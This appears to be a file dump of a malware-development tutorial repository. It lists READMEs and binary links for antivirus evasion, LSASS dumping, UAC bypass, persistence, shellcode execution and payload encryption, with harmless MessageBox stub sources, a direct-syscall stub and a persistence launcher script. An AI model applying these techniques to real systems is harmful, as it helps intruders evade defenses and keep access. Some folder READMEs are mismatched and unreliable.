--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack3.exe
--------------------------------------------------------------------------------
/2023-04-08-malware-av-evasion-15/README.md:
--------------------------------------------------------------------------------
# Malware dev: AV engines evasion techniques - part 15. C++ malware implementation.

AV engines evasion via own `GetModuleHandle` implementation. C++ malware example.

[https://cocomelonc.github.io/malware/2023/04/08/malware-av-evasion-15.html](https://cocomelonc.github.io/malware/2023/04/08/malware-av-evasion-15.html)

--------------------------------------------------------------------------------
/2023-04-08-malware-av-evasion-15/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-08-malware-av-evasion-15/hack.exe
--------------------------------------------------------------------------------
/2023-04-16-malware-av-evasion-16/README.md:
--------------------------------------------------------------------------------
# Malware dev: AV engines evasion techniques - part 16. C++ malware implementation.

AV engines evasion via own `GetProcAddress` implementation. C++ malware example.

[https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html](https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html)

--------------------------------------------------------------------------------
/2023-04-16-malware-av-evasion-16/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-16-malware-av-evasion-16/hack.exe
--------------------------------------------------------------------------------
/2023-04-27-malware-tricks-27/README.md:
--------------------------------------------------------------------------------
# Malware dev tricks - part 27. C++ malware implementation.

Malware dev trick - part 27: own `LoadLibrary` implementation. C++ malware example.

[https://cocomelonc.github.io/malware/2023/04/27/malware-tricks-27.html](https://cocomelonc.github.io/malware/2023/04/27/malware-tricks-27.html)

--------------------------------------------------------------------------------
/2023-04-27-malware-tricks-27/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-27-malware-tricks-27/hack.exe
--------------------------------------------------------------------------------
/2023-04-27-malware-tricks-27/pet.c:
--------------------------------------------------------------------------------
/*
pet.dll - DLL example for LoadLibrary
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}

// exported test functions that the loader example resolves by name
__declspec(dllexport) int _cdecl Cat() {
  MessageBox(NULL, "meow-meow", "=^..^=", MB_OK);
  return 1;
}

__declspec(dllexport) int _cdecl Mouse() {
  MessageBox(NULL, "squeak-squeak", "<:3()~", MB_OK);
  return 1;
}
--------------------------------------------------------------------------------
/2023-04-27-malware-tricks-27/pet.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-27-malware-tricks-27/pet.dll
--------------------------------------------------------------------------------
/2023-05-11-malware-tricks-28/README.md:
--------------------------------------------------------------------------------
# Malware dev trick - part 28. C++ malware implementation.
2 | 3 | Malware dev trick - part 28: dumping `LSASS` implementation. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html](https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html) 6 | -------------------------------------------------------------------------------- /2023-05-11-malware-tricks-28/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-11-malware-tricks-28/hack.exe -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev tricks - part 29. C++ malware implementation. 2 | 3 | Malware dev tricks - part 29: store binary data in Windows Registry. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html](https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html) 6 | -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-22-malware-tricks-29/hack.exe -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-22-malware-tricks-29/hack2.exe -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 
30. C++ malware implementation. 2 | 3 | Malware dev trick - part 30: find PID via `NtGetNextProcess`. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html](https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html) 6 | -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/evil.dll -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/hack.exe -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/hack2.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/hack2.exe -------------------------------------------------------------------------------- /2023-06-04-malware-tricks-31/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 31. C++ malware implementation. 2 | 3 | Malware dev trick - part 31: run shellcode via `SetTimer`. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/04/malware-tricks-31.html](https://cocomelonc.github.io/malware/2023/06/04/malware-tricks-31.html) 6 | -------------------------------------------------------------------------------- /2023-06-04-malware-tricks-31/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-04-malware-tricks-31/hack.exe -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 32. Syscalls - part 1. C++ malware implementation. 2 | 3 | Malware dev trick - part 32, intro to windows syscalls. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html](https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html) 6 | -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.c 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow-meow!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/evil.dll -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/hack.exe -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/hack2.exe -------------------------------------------------------------------------------- 
/2023-06-09-syscalls-2/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 33. Syscalls - part 2. C++ malware implementation. 2 | 3 | Malware dev trick - part 33, example of a created syscall in an assembly file. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/09/syscalls-2.html](https://cocomelonc.github.io/malware/2023/06/09/syscalls-2.html) 6 | -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/hack.exe -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/hack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/hack.o -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/syscall.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global myNtAllocateVirtualMemory 3 | myNtAllocateVirtualMemory: 4 | mov r10, rcx 5 | mov eax, 18h ; syscall number for NtAllocateVirtualMemory 6 | syscall 7 | ret -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/syscall.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/syscall.o -------------------------------------------------------------------------------- /2023-06-19-malware-av-evasion-17/README.md: -------------------------------------------------------------------------------- 1 | # 
Malware dev: AV engines evasion techniques - part 17. C++ malware implementation. 2 | 3 | AV engines evasion - part 17. First step: bypass UAC via `fodhelp.exe` via Registry modification. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html](https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html) 6 | -------------------------------------------------------------------------------- /2023-06-19-malware-av-evasion-17/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-19-malware-av-evasion-17/hack.exe -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 18. C++ malware implementation. 2 | 3 | AV engines evasion via modular multiplication-based block cipher. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/06/26/malware-av-evasion-18.html](https://cocomelonc.github.io/malware/2023/06/26/malware-av-evasion-18.html) 6 | -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-26-malware-av-evasion-18/hack.exe -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-26-malware-av-evasion-18/hack2.exe -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 34. C++ malware implementation. 2 | 3 | Malware dev trick - part 34: Enum processes via `WTSEnumerateProcessesA`. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/07/07/malware-tricks-34.html](https://cocomelonc.github.io/malware/2023/07/07/malware-tricks-34.html) 6 | -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/evil.dll -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/hack.exe -------------------------------------------------------------------------------- /2023-07-07-malware-trick-34/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-07-malware-trick-34/hack2.exe 
-------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/ErrorHandler.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | "C:\Users\user\Desktop\research\2023-07-16-malware-pers-22\hack.exe" -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 22. C/C++ malware implementation. 2 | 3 | Malware persistence technique - via Windows Setup. C/C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html](https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html) 6 | -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | evil app for windows persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/persistence/2023/07/16/malware-pers-22.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-16-malware-pers-22/hack.exe -------------------------------------------------------------------------------- /2023-07-16-malware-pers-22/pers.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-16-malware-pers-22/pers.exe -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 35. C++ malware implementation. 2 | 3 | Malware dev trick - part 35: Store payload in alternate data streams. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html](https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html) 6 | -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-07-26-malware-trick-35/hack.exe -------------------------------------------------------------------------------- /2023-07-26-malware-trick-35/meow.txt: -------------------------------------------------------------------------------- 1 | meow-meow! 2 | -------------------------------------------------------------------------------- /2023-08-13-malware-cryptography-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 1 (part 19). C++ malware implementation. 2 | 3 | Malware AV evasion - part 19: encrypt/decrypt payload via RC5. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html](https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html) 6 | -------------------------------------------------------------------------------- /2023-08-13-malware-cryptography-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-08-13-malware-cryptography-1/hack.exe -------------------------------------------------------------------------------- /2023-08-28-malware-cryptography-20/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 21. C++ malware implementation. 2 | 3 | Malware AV evasion - part 21: encrypt/decrypt payload via WAKE (Word Auto-Key Encryption). C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/10/20/malware-cryptography-21.html](https://cocomelonc.github.io/malware/2023/10/20/malware-cryptography-21.html) 6 | -------------------------------------------------------------------------------- /2023-08-28-malware-cryptography-20/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-08-28-malware-cryptography-20/hack.exe -------------------------------------------------------------------------------- /2023-09-25-malware-trick-36/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick: part 36. C++ malware implementation. 2 | 3 | Malware development trick 36: Enum process modules. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html](https://cocomelonc.github.io/malware/2023/09/25/malware-trick-36.html) 6 | -------------------------------------------------------------------------------- /2023-09-25-malware-trick-36/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-09-25-malware-trick-36/hack.exe -------------------------------------------------------------------------------- /2023-10-20-malware-cryptography-21/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 1 (part 19). C++ malware implementation. 2 | 3 | Malware AV evasion - part 19: encrypt/decrypt payload via RC5. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html](https://cocomelonc.github.io/malware/2023/08/13/malware-cryptography-1.html) 6 | -------------------------------------------------------------------------------- /2023-10-20-malware-cryptography-21/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-10-20-malware-cryptography-21/hack.exe -------------------------------------------------------------------------------- /2023-11-07-malware-trick-37/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick: part 37. C++ malware implementation. 2 | 3 | Malware development trick 37: Enum process modules via VirtualQueryEx. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/11/07/malware-trick-37.html](https://cocomelonc.github.io/malware/2023/11/07/malware-trick-37.html) 6 | -------------------------------------------------------------------------------- /2023-11-07-malware-trick-37/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-11-07-malware-trick-37/hack.exe -------------------------------------------------------------------------------- /2023-11-23-malware-cryptography-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 22. C/C++ malware implementation. 2 | 3 | Malware AV evasion - part 22: encrypt/decrypt payload via XTEA. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/11/23/malware-cryptography-22.html](https://cocomelonc.github.io/malware/2023/11/23/malware-cryptography-22.html) 6 | -------------------------------------------------------------------------------- /2023-11-23-malware-cryptography-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-11-23-malware-cryptography-22/hack.exe -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/README.md: -------------------------------------------------------------------------------- 1 | # Malware Development: persistence - part 23. Powershell example. 2 | 3 | Malware Development: persistence via LNK files. Powershell example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html](https://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html) 6 | -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | evil app for windows persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2023-12-10-malware-pers-23/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-12-10-malware-pers-23/hack.exe -------------------------------------------------------------------------------- /2023-12-25-malware-cryptography-23/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 23. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 23: encrypt/decrypt file via TEA. C++ malware example. 
4 | 5 | [https://cocomelonc.github.io/malware/2023/12/25/malware-cryptography-23.html](https://cocomelonc.github.io/malware/2023/12/25/malware-cryptography-23.html) 6 | -------------------------------------------------------------------------------- /2023-12-25-malware-cryptography-23/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-12-25-malware-cryptography-23/hack.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 24. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 24: encrypt/decrypt files via Madryga. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html](https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html) 6 | -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/hack.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/hack2.exe -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test-decrypted.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/test-decrypted.txt -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test-encrypted.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-01-16-malware-cryptography-24/test-encrypted.bin -------------------------------------------------------------------------------- /2024-01-16-malware-cryptography-24/test.txt: -------------------------------------------------------------------------------- 1 | Meow-meow! =^..^= 2 | Meow-meow! =^..^= 3 | 65535 -------------------------------------------------------------------------------- /2024-02-21-malware-cryptography-25/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 25. C/C++ malware implementation. 2 | 3 | Malware and Cryptography - part 25: encrypt/decrypt shellcode via RC6. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/02/21/malware-cryptography-25.html](https://cocomelonc.github.io/malware/2024/02/21/malware-cryptography-25.html) -------------------------------------------------------------------------------- /2024-02-21-malware-cryptography-25/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-02-21-malware-cryptography-25/hack.exe -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/README.md: -------------------------------------------------------------------------------- 1 | # Malware Persistence - part 24. C/C++ malware implementation. 
2 | 3 | Malware persistence - part 24: windows persistence via StartupApproved. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html](https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html) -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c 3 | simple DLL messagebox 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 11 | switch (nReason) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-meow!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/hack.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-03-12-malware-pers-24/hack.dll -------------------------------------------------------------------------------- /2024-03-12-malware-pers-24/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-03-12-malware-pers-24/pers.exe -------------------------------------------------------------------------------- /2024-04-09-malware-cryptography-26/README.md: -------------------------------------------------------------------------------- 1 | # Malware and Cryptography - part 26. C/C++ malware implementation. 
2 | 3 | Malware and Cryptography - part 26: encrypt/decrypt shellcode via SAFER. C malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html](https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html) -------------------------------------------------------------------------------- /2024-04-09-malware-cryptography-26/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-09-malware-cryptography-26/hack.exe -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/hack.exe -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/hack.rc: -------------------------------------------------------------------------------- 1 | 1 ICON "notepad.ico" 2 | -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/icon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/icon.o -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/notepad.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/notepad.ico -------------------------------------------------------------------------------- /2024-04-19-malware-trick-38/notepad.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-04-19-malware-trick-38/notepad.png -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick part 38. Simple C/C++ example 2 | 3 | Malware development trick 38: Hunting RWX - part 2. Target process investigation tricks. Simple C/C++ example. 4 | 5 | [https://cocomelonc.github.io/malware/2024/05/01/malware-trick-38.html](https://cocomelonc.github.io/malware/2024/05/01/malware-trick-38.html) 6 | -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack.exe -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack2.exe -------------------------------------------------------------------------------- /2024-05-01-malware-trick-38/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2024-05-01-malware-trick-38/hack3.exe -------------------------------------------------------------------------------- /2024-05-12-malware-cryptography-27/hack.exe: -------------------------------------------------------------------------------- 
